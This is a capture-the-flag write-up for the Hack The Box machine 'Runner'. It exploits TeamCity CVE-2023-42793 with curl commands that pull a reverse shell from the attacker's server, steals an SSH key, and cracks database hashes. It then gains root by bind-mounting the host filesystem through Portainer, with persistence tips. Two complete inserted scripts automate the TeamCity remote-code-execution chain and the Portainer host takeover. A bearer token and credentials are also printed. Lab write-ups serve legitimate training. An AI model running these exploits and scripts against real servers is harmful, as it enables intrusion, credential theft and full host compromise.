Shell as TCUser

 

My first time trying this machine I gave up because I couldn't find anything. I came back again and still couldn't find anything. I guess there's a random subdomain that isn't in any of my subdomain lists. I tried two lists, one with 20,000 and one with 110,000 subdomains, and neither of them had "teamcity". Not sure how we were supposed to find this.

The name needed is teamcity.runner.htb. It is a virtual host on the same web server as runner.htb, so it only turns up when fuzzing the Host header (vhost fuzzing against the box's IP), not when resolving names through DNS.

We have a TeamCity login page.

There is a known exploit for CVE-2023-42793 (TeamCity authentication bypass, fixed in 2023.05.4) that uses the bypass to create an admin user:

https://github.com/H454NSec/CVE-2023-42793

The script registers a new administrator whose username carries a random numeric suffix; in this run the account it created was:

H454NSec6856:@H454NSec

Now, getting a shell was super difficult, but following this script made it possible. The GitHub page claims it does it automatically, but it doesn't. So I read the script and did it manually with curl, which took forever, but eventually I got working payloads.

https://github.com/H454NSec/CVE-2023-42793

First we need a token. The bypass means any request path ending in /RPC2 skips authentication, so a POST to /app/rest/users/id:1/tokens/RPC2 issues an access token for user id 1, the built-in admin, and returns it in the response XML. If we get a 400 error, a token named RPC2 already exists: delete the current token and run the POST again.

curl -X DELETE http://teamcity.runner.htb/app/rest/users/id:1/tokens/RPC2

One caveat a practitioner should know: TeamCity only serves /app/rest/debug/processes when the internal property rest.debug.processes.enable=true is present in config/internal.properties. The public PoCs write that property through the admin data-directory editor (/admin/dataDir.html) once they hold the admin token, so if the commands below come back with an error about the endpoint being disabled, that step of the script has not run yet.

1st command, which downloads shell.sh (a reverse shell we host on our own web server) onto the target:

curl -XPOST "http://teamcity.runner.htb/app/rest/debug/processes?exePath=curl&params=http://10.10.14.32:8000/shell.sh&params=-o&params=shell.sh" -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.anItdVg3WFF5Qnp5SlhCcjROXzk0cWROS0xz.MzlkZjU2MWUtNjA0OC00NDk0LWI3YmEtZDUxYTYzYTgzODA2" -H "Content-Type: text/plain"

2nd command, which runs chmod +x shell.sh (the + has to be sent as %2b, because a bare + in a query string decodes to a space):

curl -XPOST "http://teamcity.runner.htb/app/rest/debug/processes?exePath=chmod&params=%2bx&params=shell.sh" -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.anItdVg3WFF5Qnp5SlhCcjROXzk0cWROS0xz.MzlkZjU2MWUtNjA0OC00NDk0LWI3YmEtZDUxYTYzYTgzODA2" -H "Content-Type: text/plain"

3rd command, which executes ./shell.sh (the path is hex-encoded here, although . and / are safe in a query string and only the + above actually needed encoding):

curl -XPOST "http://teamcity.runner.htb/app/rest/debug/processes?exePath=%2e%2f%73%68%65%6c%6c%2e%73%68" -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.anItdVg3WFF5Qnp5SlhCcjROXzk0cWROS0xz.MzlkZjU2MWUtNjA0OC00NDk0LWI3YmEtZDUxYTYzYTgzODA2" -H "Content-Type: text/plain"
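The same token-then-three-commands chain as one script, added here as an example; it is neither the author's notes nor the linked PoC. It assumes a TeamCity server vulnerable to CVE-2023-42793 at BASE (defaulting to the hostname above), that user id 1 is the admin, that the debug endpoint is already enabled, and that shell.sh is served from the attacker on port 8000. The function names (urlencode, build_exec_url, extract_token, get_token, tc_exec) are this example's own. The encoder is what removes the guesswork the manual curl commands needed: every exePath and params value is percent-encoded, so + becomes %2B and URLs in arguments survive intact.

```sh
#!/bin/sh
# Added example, not the author's code or the CVE-2023-42793 PoC's code.
# Assumptions: TeamCity vulnerable to CVE-2023-42793 at $BASE, user id 1 is
# the admin, rest.debug.processes.enable=true is already set, and the
# attacker serves shell.sh over HTTP on port 8000.

BASE=${BASE:-http://teamcity.runner.htb}

# Percent-encode one value for a query string. A bare '+' would be decoded
# as a space by the server, which is why the manual chmod call used %2b.
urlencode() {
  s=$1; out=
  while [ -n "$s" ]; do
    c=${s%"${s#?}"}; s=${s#?}
    case $c in
      [A-Za-z0-9._~-]) out="$out$c" ;;
      *) out="$out$(printf '%%%02X' "'$c")" ;;
    esac
  done
  printf '%s' "$out"
}

# Build the /app/rest/debug/processes URL: exePath=<exe> then one
# params=<arg> per argument, all encoded.
build_exec_url() {
  base=$1; exe=$2; shift 2
  url="$base/app/rest/debug/processes?exePath=$(urlencode "$exe")"
  for a in "$@"; do url="$url&params=$(urlencode "$a")"; done
  printf '%s' "$url"
}

# Pull the token out of the XML the token endpoint returns, e.g.
#   <token name="RPC2" creationTime="..." value="eyJ0eXAi..."/>
extract_token() {
  printf '%s' "$1" | sed -n 's/.*value="\([^"]*\)".*/\1/p' | head -n 1
}

# Paths ending in /RPC2 bypass authentication, so an unauthenticated POST
# here mints an access token for user id 1. A 400 means a token named RPC2
# already exists: delete it and retry once.
get_token() {
  body=$(curl -s -X POST "$BASE/app/rest/users/id:1/tokens/RPC2")
  tok=$(extract_token "$body")
  if [ -z "$tok" ]; then
    curl -s -X DELETE "$BASE/app/rest/users/id:1/tokens/RPC2" >/dev/null
    body=$(curl -s -X POST "$BASE/app/rest/users/id:1/tokens/RPC2")
    tok=$(extract_token "$body")
  fi
  [ -n "$tok" ] && printf '%s' "$tok"
}

# Run one command on the server through the debug endpoint.
tc_exec() {
  tok=$1; exe=$2; shift 2
  curl -s -X POST "$(build_exec_url "$BASE" "$exe" "$@")" \
    -H "Authorization: Bearer $tok" -H "Content-Type: text/plain"
}

# Usage: sh tc_rce.sh <attacker-ip>   (serve shell.sh on port 8000 first)
if [ $# -ge 1 ]; then
  LHOST=$1
  tok=$(get_token) || { echo "could not obtain a token" >&2; exit 1; }
  tc_exec "$tok" curl "http://$LHOST:8000/shell.sh" -o shell.sh
  tc_exec "$tok" chmod +x shell.sh
  tc_exec "$tok" ./shell.sh
fi
```

Without an argument the script only defines its functions, so the pure helpers can be checked offline; with the attacker IP as its argument it performs the chain against BASE.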

There is no user flag here, and we are inside a Docker container: the TeamCity server runs containerised, so this shell is not on the host.

Shell as John

 

Useful findings inside the container: the TeamCity data directory stores SSH keys uploaded to projects under

/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys

and there is an id_rsa private key in that directory.

We copy the id_rsa key out and can verify who it's for with ssh-keygen: ssh-keygen -y -f id_rsa prints the matching public key, and for an OpenSSH-format key the comment at the end of that line is the user@host it was generated for. The copied file needs chmod 600 before ssh will accept it.

Then we can ssh in as john and get the user.txt file.

Privilege escalation to Root

 

We are on the machine, but our user has little to no access. We can only write to /tmp, and whatever we put there gets deleted shortly after. There is a second user named matthew.

I got a small hint that I missed something in the Docker container about getting creds for matthew.

Back in the container, /opt/teamcity/bin/maintainDB.sh can create a backup of the database; however, I kept getting errors. It turns out we need to delete the buildserver.lck file, which is the lock the running server keeps on the data directory to stop a second instance from using it, and then it works.

rm /data/teamcity_server/datadir/system/buildserver.lck

cd /opt/teamcity/bin && ./maintainDB.sh backup --all

This writes a zip file to the backup directory. We unzip it, give our user read rights on the extracted files, and read the users table in database_dump to get the password hashes. TeamCity stores them as bcrypt, so hashcat mode 3200 (or john's bcrypt format) is what cracks them.

/data/teamcity_server/datadir/backup/database_dump

Matthew's password cracks to piper123, but we cannot ssh in with it.

matthew:piper123

After running linpeas I saw, in the nginx configuration, another web page that we didn't have access to:

server {
   listen 80;
   server_name portainer-administration.runner.htb;
   location / {
       proxy_pass https://localhost:9443;
       proxy_http_version 1.1;
       proxy_set_header Upgrade $http_upgrade;
       proxy_set_header Connection 'upgrade';
       proxy_set_header Host $host;
       proxy_cache_bypass $http_upgrade;

 

I upload chisel so we can set up a reverse port forward and reach the web page. It is a site called Portainer (portainer.io), and I realise very quickly that we can set up Docker containers with it. Creating a regular container will not work, as it is isolated. After a bunch of trial and error and some help from ChatGPT, I am able to mount the root directory of the actual file system. I tried finding things online and reading the documentation on doing this, but there was very, very little, so thankfully ChatGPT helped with this.

Two details from the nginx block are worth noting. It listens on port 80 with server_name portainer-administration.runner.htb, so the same page is also reachable with no tunnel at all by adding that name to /etc/hosts pointed at the box. And the proxy_pass target is https://localhost:9443, so anything forwarded straight to 9443 must be spoken to over HTTPS (the certificate is self-signed, hence curl -k).

Step one is creating a volume that binds to the host's root directory (/). In Portainer this is a volume on the local driver with the driver options type=none, o=bind and device=/.

Step two is creating the container and attaching the volume created above to a mount point inside it.

Once that is done we can connect via the web GUI by selecting Console. This time we can cd into the mounted directory, which is the host's root filesystem, and we have the root flag.
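The two GUI steps above, done through Portainer's Docker API proxy instead, added here as an example; it is not the author's procedure and not Portainer's own code. It assumes Portainer is reachable on 127.0.0.1:9443 after a chisel forward (attacker: chisel server --reverse -p 8000; target: ./chisel client <attacker-ip>:8000 R:9443:127.0.0.1:9443), that the matthew:piper123 credentials recovered above are the Portainer login, that the local Docker endpoint has id 2 (check GET /api/endpoints), and that the chosen image already exists on the host, since the box may have no Internet access to pull one. The volume_body, container_body, docker_api and login names are this example's own.

```sh
#!/bin/sh
# Added example, not the author's GUI steps and not Portainer's code.
# Assumptions: Portainer at $PORTAINER (after a chisel forward), the Docker
# endpoint id is $ENDPOINT_ID, and the image named on the command line is
# already present on the host (GET .../images/json lists what is there).

PORTAINER=${PORTAINER:-https://127.0.0.1:9443}
ENDPOINT_ID=${ENDPOINT_ID:-2}

# JSON body for POST /volumes/create: a "local" volume whose backing store is
# a bind mount of a host path. These three driver options are exactly what
# the GUI's volume "Driver options" fields need (type=none, o=bind, device).
volume_body() {
  printf '{"Name":"%s","Driver":"local","DriverOpts":{"type":"none","o":"bind","device":"%s"}}' "$1" "$2"
}

# JSON body for POST /containers/create: mount the volume at /mnt and keep
# the container alive so a console can be attached. No --privileged needed;
# the bind mount alone exposes the host filesystem.
container_body() {
  printf '{"Image":"%s","Cmd":["tail","-f","/dev/null"],"HostConfig":{"Binds":["%s:/mnt"]}}' "$1" "$2"
}

# Docker Engine API path as proxied by Portainer for one endpoint.
docker_api() {
  printf '%s/api/endpoints/%s/docker%s' "$PORTAINER" "$1" "$2"
}

# POST /api/auth returns {"jwt":"..."}; that JWT is the bearer token.
login() {
  curl -sk -X POST "$PORTAINER/api/auth" -H 'Content-Type: application/json' \
    -d "{\"Username\":\"$1\",\"Password\":\"$2\"}" |
    sed -n 's/.*"jwt":"\([^"]*\)".*/\1/p'
}

# Usage: sh portainer_hostroot.sh <user> <password> [image]
if [ $# -ge 2 ]; then
  user=$1; pass=$2; image=${3:-alpine}
  jwt=$(login "$user" "$pass")
  [ -n "$jwt" ] || { echo "login failed" >&2; exit 1; }
  auth="Authorization: Bearer $jwt"
  json='Content-Type: application/json'
  curl -sk -X POST "$(docker_api "$ENDPOINT_ID" /volumes/create)" \
    -H "$auth" -H "$json" -d "$(volume_body hostroot /)" >/dev/null
  cid=$(curl -sk -X POST "$(docker_api "$ENDPOINT_ID" '/containers/create?name=hostroot')" \
    -H "$auth" -H "$json" -d "$(container_body "$image" hostroot)" |
    sed -n 's/.*"Id":"\([^"]*\)".*/\1/p')
  [ -n "$cid" ] || { echo "container create failed" >&2; exit 1; }
  curl -sk -X POST "$(docker_api "$ENDPOINT_ID" "/containers/$cid/start")" -H "$auth"
  echo "started $cid; open its console in Portainer and run: chroot /mnt /bin/bash"
fi
```

Without arguments the script only defines the helpers. The bind-mounted host root is worth more than a flag read: chroot /mnt from the console is a real root shell on the host, and anything written under /mnt (an authorized_keys entry for root, a setuid copy of a shell) persists there, which is the measure of what Portainer access with a low-privilege account is actually worth.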

 

Priv esc on this machine was very very cool but difficult do to the lack of documentation. Really fun machine.